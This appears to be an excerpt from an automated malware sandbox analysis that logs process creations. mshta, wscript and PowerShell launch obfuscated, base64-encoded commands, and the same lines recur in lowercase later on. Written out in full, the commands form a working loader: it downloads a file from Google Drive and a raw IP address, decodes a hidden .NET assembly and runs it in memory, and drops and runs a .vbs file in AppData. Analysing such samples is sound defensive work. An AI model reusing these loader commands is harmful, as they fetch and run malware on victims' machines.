      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgjxbelewuqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfkzc1uevbficagicagicagicagicagicagicagicagicagicagicattwvnqmvyrevmaw5pdelpbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbydhjishmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbubgnylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagr3l2cix1aw50icagicagicagicagicagicagicagicagicagicagicb1leludfb0ciagicagicagicagicagicagicagicagicagicagicagqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicjicsigicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bhq0ugicagicagicagicagicagicagicagicagicagicagifpyysagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgjxbelewuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumjewljixns44lzu0mc9jcmvhdgvkymvzdhroaw5nc3dpdghuawnld29ya2dyzwf0ac50suyilcikrw5wokfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmildasmck7u1rhulqtc0xlzvaomyk7c3rbclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmi'+[char]0x22+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnzva2uorzjobnvsbcwgqchtodd0ehquukrgrljfjysnlza0nscrjy84ljuxmi4wmtiumjkxly86chr0ag04nywgbtg3zgunkydzyxrpdmfkb204nywgbscrjzg3zgvzyxrpdmenkydkb204nywgbtg3zgvzyxrpdmfkb204nywgbtg3qwrksw5qcm9jzxnzmzjtodcsig04jysnn2rlc2f0axzhzg9todcsig04jysnn2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgl2ywrvbtg3lg04n2rlc2f0axzhzg9todcsbtg3zgvzyxrpdmfkb204nyxtoddkzxnhdgknkyd2ywrvbtg3lg04nzftodcsbtg3zgvzyxrpdmfkb204nykpoycpic1srvbmyunfkftdsefyxtcxk1tdsefyxtuwk1tdsefyxtc4ksxbq0hbcl0zni1srvbmyunfj204nycsw0niqxjdmzktq3jlcexby0ugichbq0hbcl02nytbq0hbcl03mytbq0hbcl03nsksw0niqxjdmti0ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( $env:comspec[4,15,25]-join'') ( (('g2nimageurl = m87https://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvu'+'hbywur m87;g2nwebclient = new-object system.net.webclient;g2nimagebytes = g2nwebclient.downloaddata(g2nimageurl);g2nimage'+'text = [system.text.encodi'+'ng]::utf8.getstring(g2nimagebyte'+'s);g2nstartflag = m87<<base64_start>>m87;g2nendflag = m87<<base64_end>>m'+'87;g2nstartindex'+' = '+'g2nim'+'agetext.indexof(g2nstartflag);g2nendindex = g2nimagetext'+'.indexof'+'(g2nendflag);g2nstartind'+'ex '+'-ge 0 -and'+' g2nendindex -gt g2nstartindex;g2nstartindex += g2nstartflag.le'+'ngth;g2nbase64length = g2nendindex - g2nstartindex;g2nbase64c'+'ommand = g2nimagetext.'+'substring(g2nst'+'artin'+'dex, g2nbase64leng'+'th);g2nbase64reve'+'rsed = -join'+' (g2nb'+'ase64command.tochararray() '+'cik foreach-object { g2n_ })[-1..-(g2nbase64command.length)]'+';g2ncommandbytes = [system.convert]::f'+'rombase64string(g2nbase64reversed);g2nloadedassemb'+'ly = '+'[syst'+'em.reflection.as'+'sembly]::load(g2ncommandbytes);g2nvaimethod = [dnlib.io.home].getmethod(m87vaim87);g2nvaimethod.invoke(g2nnull, @(m87txt.rdffre'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87addinprocess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -replace([char]71+[char]50+[char]78),[char]36-replace'm87',[char]39-creplace ([char]67+[char]73+[char]75),[char]124) )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jgjxbelewuqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfkzc1uevbficagicagicagicagicagicagicagicagicagicagicattwvnqmvyrevmaw5pdelpbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbydhjishmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbubgnylhn0cmluzyagicagicagicagicagicagicagicagicagicagicagr3l2cix1aw50icagicagicagicagicagicagicagicagicagicagicb1leludfb0ciagicagicagicagicagicagicagicagicagicagicagqsk7jyagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicjicsigicagicagicagicagicagicagicagicagicagicagic1oyu1fu3bhq0ugicagicagicagicagicagicagicagicagicagicagifpyysagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjgjxbelewuq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumjewljixns44lzu0mc9jcmvhdgvkymvzdhroaw5nc3dpdghuawnld29ya2dyzwf0ac50suyilcikrw5wokfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmildasmck7u1rhulqtc0xlzvaomyk7c3rbclqgicagicagicagicagicagicagicagicagicagicagicikzw52okfquerbvefcy3jlyxrlzgjlc3r0agluz3n3axrobmljzxdvcmtncmvhdc52ylmi'+[char]0x22+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoicrltny6y29tu3blq1s0lde1ldi1xs1qb2lujycpicggkcgnrzjoaw1hz2vvcmwgpsbtoddodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2fkjmlkptfbsvznskpkdjfgnicrj3ztnhnvt3libkgtc0r2vscrj2hcwxd1cibtodc7rzjod2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddthmk5pbwfnzuj5dgvzid0grzjod2viq2xpzw50lkrvd25sb2fkrgf0yshhmk5pbwfnzvvybck7rzjoaw1hz2unkyduzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kascrj25nxto6vvrgoc5hzxrtdhjpbmcorzjoaw1hz2vcexrljysncyk7rzjoc3rhcnrgbgfnid0gbtg3pdxcqvnfnjrfu1rbulq+pm04nzthmk5lbmrgbgfnid0gbtg3pdxcqvnfnjrfru5epj5tjysnodc7rzjoc3rhcnrjbmrleccrjya9iccrj0cytmltjysnywdlvgv4dc5jbmrlee9mkecytnn0yxj0rmxhzyk7rzjozw5ksw5kzxggpsbhmk5pbwfnzvrlehqnkycusw5kzxhpzicrjyhhmk5lbmrgbgfnktthmk5zdgfydeluzccrj2v4iccrjy1nzsawic1hbmqnkycgrzjozw5ksw5kzxgglwd0iecytnn0yxj0sw5kzxg7rzjoc3rhcnrjbmrlecarpsbhmk5zdgfydezsywcutgunkyduz3roo0cytmjhc2u2nexlbmd0aca9iecytmvuzeluzgv4ic0grzjoc3rhcnrjbmrledthmk5iyxnlnjrdjysnb21tyw5kid0grzjoaw1hz2vuzxh0licrj1n1ynn0cmluzyhhmk5zdccrj2fydelujysnzgv4lcbhmk5iyxnlnjrmzw5njysndggpo0cytmjhc2u2nfjldmunkydyc2vkid0glwpvaw4nkycgkecytminkydhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksankyddsusgrm9yrwfjac1pymply3qgeybhmk5fih0pwy0xli4tkecytmjhc2u2nenvbw1hbmqutgvuz3rokv0nkyc7rzjoy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6ricrj3jvbujhc2u2nfn0cmluzyhhmk5iyxnlnjrszxzlcnnlzck7rzjobg9hzgvkqxnzzw1ijysnbhkgpsankydbu3lzdccrj2vtlljlzmxly3rpb24uqxmnkydzzw1ibhldojpmb2fkkecytmnvbw1hbmrcexrlcyk7rzjodmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchtoddwqultodcpo0cytnzhau1ldghvzc5jbnz